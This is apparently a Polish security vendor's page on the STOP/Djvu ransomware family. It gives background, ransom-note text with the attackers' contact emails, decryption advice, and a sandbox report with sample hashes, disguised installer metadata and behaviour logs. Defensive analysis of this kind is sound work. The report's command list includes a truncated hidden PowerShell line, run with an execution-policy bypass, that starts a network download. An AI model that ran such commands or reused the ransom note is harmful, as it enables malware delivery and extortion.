ZATRZYMAJ Djvu Ransomware

Rodzina STOP Ransomware, określana również jako rodzina STOP Djvu Ransomware, jest groźnym złośliwym oprogramowaniem. STOP Djvu to tylko jedno z wielu zagrożeń, które mają wspólne cechy i pochodzą z ransomware STOP, mimo że niektóre z ich metod wpływania na typy plików i szyfrowania rozszerzeń plików różnią się.

Pierwotne oprogramowanie ransomware STOP zostało zauważone przez badaczy bezpieczeństwa już w lutym 2018 r. Jednak od tego czasu ewoluowało, a jego rodzina klonów i odgałęzień powiększyła się. Podstawową metodą dystrybucji ransomware STOP były kampanie spamowe e-mail wykorzystujące uszkodzone załączniki.

STOP Djvu Ransomware działa w sposób podobny do innych zagrożeń ransomware tego rodzaju, szyfrując i blokując dostęp do kluczowych plików, które użytkownicy mogą wykorzystywać w swoim systemie. Pliki osobiste, zdjęcia, dokumenty i nie tylko mogą być szyfrowane i zasadniczo wyłączone dla wszystkich użytkowników na komputerze. STOP Djvu Ransomware został po raz pierwszy zauważony w grudniu 2018 r. w dość udanej kampanii infekcji online. Badacze nie byli świadomi sposobu rozprzestrzeniania się ransomware, ale później ofiary zgłaszały, że odkrywały infekcje po pobraniu keygenów lub cracków. Po wystąpieniu infekcji ransomware STOP Djvu zmienia ustawienia systemu Windows, dołączając pliki o różnych nazwach, takich jak .djvu, .djvus, .djvuu, .uudjvu, .udjvu lub .djvuq oraz ostatnie rozszerzenia .promorad i .promock. Nowsze wersje nie mają jeszcze deszyfratora, ale starsze można odszyfrować za pomocą STOPDecrypter. Użytkownikom zaleca się unikanie płacenia okupu, bez względu na wszystko.

Metoda stosowana do blokowania dostępu do plików wykorzystuje algorytm szyfrowania RSA. Chociaż odszyfrowanie plików może wydawać się trudne dla niedoświadczonych użytkowników, zdecydowanie nie ma potrzeby podejmowania jakichkolwiek wysiłków, aby zapłacić osobom stojącym za zagrożeniem. W takich sytuacjach zwykle składane są fałszywe obietnice, więc użytkownicy mogą szybko dowiedzieć się, że są ignorowane po dokonaniu płatności.

Ataki ransomware STOP Djvu zostały po raz pierwszy zgłoszone pod koniec 2018 roku. Główną metodą dystrybucji STOP Djvu pozostały wiadomości spamowe, a poprawki w rdzeniu ransomware były stosunkowo niewielkie. Większość fałszywych, zhakowanych załączników wykorzystywanych w wiadomościach spamowych stanowiły dokumenty biurowe z obsługą makr lub fałszywe pliki PDF, które uruchamiałyby oprogramowanie ransomware bez wiedzy ofiary. Zachowanie STOP Djvu również się nie zmieniło - ransomware nadal usuwa wszystkie migawki Shadow Volume, aby pozbyć się kopii zapasowych, a następnie zaczyna szyfrować pliki ofiary.

W notatce dotyczącej okupu, która jest zapisywana jako „_openme.txt" na pulpicie ofiary, wprowadzono drobne zmiany. Tekst żądania okupu można znaleźć tutaj:

'[początek żądania okupu]
———————— WSZYSTKIE TWOJE PLIKI SĄ ZASZYFROWANE ————————

Nie martw się, możesz zwrócić wszystkie swoje pliki!
Wszystkie Twoje pliki, dokumenty, zdjęcia, bazy danych i inne ważne są zaszyfrowane najsilniejszym szyfrowaniem i unikalnym kluczem.
Jedyną metodą odzyskania plików jest zakup narzędzia do odszyfrowywania i unikalnego klucza.
To oprogramowanie odszyfruje wszystkie zaszyfrowane pliki.
Jakie gwarancje Państwu dajemy?
Możesz wysłać jeden ze swoich zaszyfrowanych plików ze swojego komputera, a my odszyfrujemy go za darmo.
Ale możemy odszyfrować tylko 1 plik za darmo. Plik nie może zawierać cennych informacji
Nie próbuj używać narzędzi odszyfrowywania innych firm, ponieważ zniszczy to twoje pliki.
Zniżka 50% dostępna, jeśli skontaktujesz się z nami przez pierwsze 72 godziny.

———————————————————————————————————-

Aby otrzymać to oprogramowanie musisz napisać na nasz e-mail:
pomocshadow@india.com

Zarezerwuj adres e-mail, aby się z nami skontaktować:
helpshadow@firemail.cc

Twój dowód osobisty: [napis]
[koniec żądania okupu]'

Ransomware początkowo ograniczało się do zmiany nazwy zaszyfrowanych plików na rozszerzenie .djvu, co było ciekawym wyborem, ponieważ .djvu jest w rzeczywistości legalnym formatem plików opracowanym przez AT&T Labs i używanym do przechowywania zeskanowanych dokumentów, nieco podobnym do formatu .pdf firmy Adobe. Późniejsze wersje oprogramowania ransomware przyjęły szereg innych rozszerzeń dla zaszyfrowanych plików, w tym „.chech", „.luceq", „.kroput1," „.charck", „.kropun", „.luces", „.pulsar1". „.uudjvu", „.djvur", „.tfude", „.tfudeq" i „.tfudet".

Niektóre odmiany ransomware STOP Djvu można odszyfrować za darmo, korzystając z tak zwanego „STOPDecrypter", który został opracowany przez badacza bezpieczeństwa Michaela Gillespie i jest dostępny online do bezpłatnego pobrania.

ZATRZYMAJ Djvu Ransomware wideo

Wskazówka: Proszę włączyć dźwięk ON i oglądać filmy w trybie pełnoekranowym.

ZATRZYMAJ Djvu Ransomware zrzutów ekranu

stop djvu ransomware note

Raport z analizy

Informacje ogólne

Nazwisko: STOP/DJVU Ransomware
Status podpisu: No Signature

Znane próbki

MD5: def8a7bfe5fe47d95a95085d8dbc7a53
SHA1: 7182d4b2f55a560d83edf0824e119f71fa8422b6
SHA256: B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192
Rozmiar pliku: 6.29 MB , 6292105 bajtów
MD5: a6b8c0cb178c31dd347554c3e5a0d5f8
SHA1: 91864f269d696ee80869cfeb3c9a204f8031a3bb
SHA256: 4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C
Rozmiar pliku: 3.47 MB , 3471869 bajtów
MD5: 2336c9624d9a44c393d354206226f508
SHA1: ea7edc388ad62990f52b9ed40df26d20f4e20190
SHA256: CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0
Rozmiar pliku: 1.36 MB , 1359918 bajtów
MD5: 42f32aa699bc45a3638ddeb325ebebc1
SHA1: 508cea3ba2bf04cc6851295f92bf0e752071f6b8
SHA256: 16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4
Rozmiar pliku: 1.33 MB , 1328186 bajtów
MD5: 2391d41548b6432191f73edefa273928
SHA1: 620b714f84955aa7fb9a2f2cd528daa1621e18af
SHA256: 4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959
Rozmiar pliku: 3.36 MB , 3357556 bajtów
Pokaż więcej
MD5: 710c3a1beb616d4aa7d5ed9a7f8848e4
SHA1: 326da9ddc0ea840e83f31fbf1f3377a06c911fe5
SHA256: 051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB
Rozmiar pliku: 1.36 MB , 1364106 bajtów
MD5: 601b120a6f39f72847b2f581a3d5f158
SHA1: 0cc5781c1cfe6c5d034bd098229773e80e083732
SHA256: BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818
Rozmiar pliku: 4.86 MB , 4858569 bajtów
MD5: a7b76a49f289081961f8f3824f0b62ca
SHA1: 6908790199785be7fc6c4eeb1fe426ee1b66cc0b
SHA256: 1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45
Rozmiar pliku: 1.41 MB , 1406899 bajtów
MD5: 9f37930d62a1e08f68aa0a72472e7a55
SHA1: 27706b3ff639e5dfa264a823dbe9229cf34ae153
SHA256: 29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F
Rozmiar pliku: 600.12 KB , 600124 bajtów
MD5: 7a18839fe61e9cde0e8fea3100acfb2b
SHA1: 9476c97a73e027016e9f6f2f20c2fb19264cd837
SHA256: 0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF
Rozmiar pliku: 316.83 KB , 316832 bajtów
MD5: fe17d0f940a226e80cc18b4399da4ffc
SHA1: cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b
SHA256: D869A00DFA1BE0DF6D08BB72B790894D1861834D5E350F5DD54A70C3711BA713
Rozmiar pliku: 1.36 MB , 1363661 bajtów
MD5: ed83bea5600457af815495b10f235b87
SHA1: 14ac62ce3ae6b19186544e46ad7710d1814e3a9c
SHA256: FC0AE843E31F77574448FF343F0E92A9F1953B43DC2495FFE2CA5F7F8E777401
Rozmiar pliku: 9.59 MB , 9590154 bajtów
MD5: 8cc4ef6bfd98074474e53cefc0029d0a
SHA1: 7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9
SHA256: 72BE2A65C8E36058A40FB1EF582E944721F5D041044F454509242E00E6745198
Rozmiar pliku: 1.41 MB , 1407173 bajtów
MD5: 75e7ec1010908f6cf964ee32c9d57fed
SHA1: 7cccec52318eadb6771ceef6404e19fc46ec8d07
SHA256: A309D56010D51F07741773ABCC44C767EF99C1031DEFA575F07D11DD11F09E35
Rozmiar pliku: 2.44 MB , 2442353 bajtów

Atrybuty pliku wykonywalnego przenośnego systemu Windows

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File has exports table
  • File has TLS information
  • File is 32-bit executable
  • File is 64-bit executable
  • File is either console or GUI application
Pokaż więcej
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

Ikony plików

Informacje o wersji systemu Windows PE

Imię Wartość
Assembly Version 1.4.1.0
Comments This installation was built with Inno Setup.
Company Name
  • Alexander Roshal
  • Microsoft
  • TrayToolbar
  • win.rar GmbH
  • WinTools Software Engineering, Ltd.
File Description
  • Archiwizer WinRAR
  • Gestione archivi WinRAR
  • RAM Saver Professional
  • TrayToolbar
  • WinRAR 5.60 64 Bit Setup
  • WinRAR archiver
  • WinRAR Installer
File Version
  • 26.3.1
  • 26.2.1
  • 26.0.1
  • 25.7.1
  • 25.6.1
  • 25.4.1
  • 7.21.0.0
  • 6.20.2
  • 6.2.0
  • 1.4.1.0
Pokaż więcej
  • 1.3.0.0
  • 1.00
Internal Name
  • TJprojMain
  • TrayToolbar.dll
  • Win
  • WinRAR
  • winrar-7.21-setup
Legal Copyright
  • Copyright © 1993-2026 Александр Рошал
  • Copyright © Alexander Roshal 1993-2021
  • Copyright © Alexander Roshal 1993-2022
  • Copyright © Alexander Roshal 1993-2025
  • © Brontech, LLC
Original Filename
  • TJprojMain.exe
  • TrayToolbar.dll
  • Win.exe
  • winrar-7.21-setup.exe
  • WinRAR.exe
Product Name
  • Project1
  • RAM Saver 25.4.1 Professional
  • RAM Saver 25.6.1 Professional
  • RAM Saver 25.7.1 Professional
  • RAM Saver 26.0.1 Professional
  • RAM Saver 26.2.1 Professional
  • RAM Saver 26.3.1 Professional
  • TrayToolbar
  • Win
  • WinRAR
Pokaż więcej
  • WinRAR 5.60 64 Bit
  • WinRAR Installer
Product Version
  • 26.3.1
  • 26.2.1
  • 26.0.1
  • 25.7.1
  • 25.6.1
  • 25.4.1
  • 7.21
  • 6.20.2
  • 6.2.0
  • 5.60
Pokaż więcej
  • 1.4.1+80dec33e25323db7125ddec35b475aa881292801
  • 1.4.0
  • 1.00

Podpisy cyfrowe

Podpisujący Źródło Status
win.rar GmbH DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 Self Signed
win.rar GmbH GlobalSign CodeSigning CA - SHA256 - G3 Hash Mismatch

Cechy pliku

  • .NET
  • 2+ executable sections
  • big overlay
  • fptable
  • HighEntropy
  • Inno
  • InnoSetup Installer
  • Installer Manifest
  • Installer Version
  • MZ (In Overlay)
Pokaż więcej
  • No Version Info
  • Nullsoft Installer
  • RAR (In Overlay)
  • RARinO
  • Run
  • SusSec
  • vb6
  • WinRAR SFX
  • WRARSFX
  • x64
  • x86

Zmodyfikowane pliki

Plik Atrybuty
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
\device\namedpipe\gmdasllogger Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-2buvv.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-bfiig.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-dlucn.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp Generic Write,Read Attributes
Pokaż więcej
c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-l4opd.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\nshfa46.tmp\chip.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\header.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\nsdialogs.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\screenshot.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\system.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\winrar-x64-721b1ru.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\yandex.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\yandexbrowsersetup.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsrfa35.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\system.dll Generic Write,Read Attributes

Modyfikacje rejestru

Klucz::Wartość Dane Nazwa API
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 wk�8�jg�B �� �6 �v �� 7� �� �� ۀ���T�B���������%��3bBx�<���!#��$kF$��%`�%�&� &�-'�!(�(X�(�) ;)E)�`*J*9*�",=�-!R0P%1`1�1HO5,]5�G>��@V�@�*A��B B��E�mF  RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 졷鑂셱ǜ RegNtPreCreateKey

Użycie interfejsu API systemu Windows

Kategoria API
Other Suspicious
  • SetWindowsHookEx
Anti Debug
  • IsDebuggerPresent
  • OutputDebugString
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Manipulation Evasion
  • NtUnmapViewOfSection
  • ZwMapViewOfSection
Process Shell Execute
  • CreateProcess
Keyboard Access
  • GetKeyState
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
Pokaż więcej
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtUnmapViewOfSection
  • ntdll.dll!NtUnmapViewOfSectionEx
  • ntdll.dll!NtWaitForAlertByThreadId
  • ntdll.dll!NtWaitForMultipleObjects
  • ntdll.dll!NtWaitForSingleObject
  • ntdll.dll!NtWaitForWorkViaWorkerFactory
  • ntdll.dll!NtWaitLowEventPair
  • ntdll.dll!NtWorkerFactoryWorkerReady
  • ntdll.dll!NtWriteFile
  • UNKNOWN
Encryption Used
  • BCryptOpenAlgorithmProvider

Wykonywanie poleceń powłoki

"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"
"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"
"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"
"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"
"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"
Pokaż więcej
powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient
"C:\Users\Czxnhiuo\AppData\Local\Temp\is-L4OPD.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp" /SL5="$40356,931898,131584,c:\users\user\downloads\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661"
"C:\Users\Rziyzfeg\AppData\Local\Temp\is-DLUCN.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp" /SL5="$1C02AC,975756,131584,c:\users\user\downloads\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173"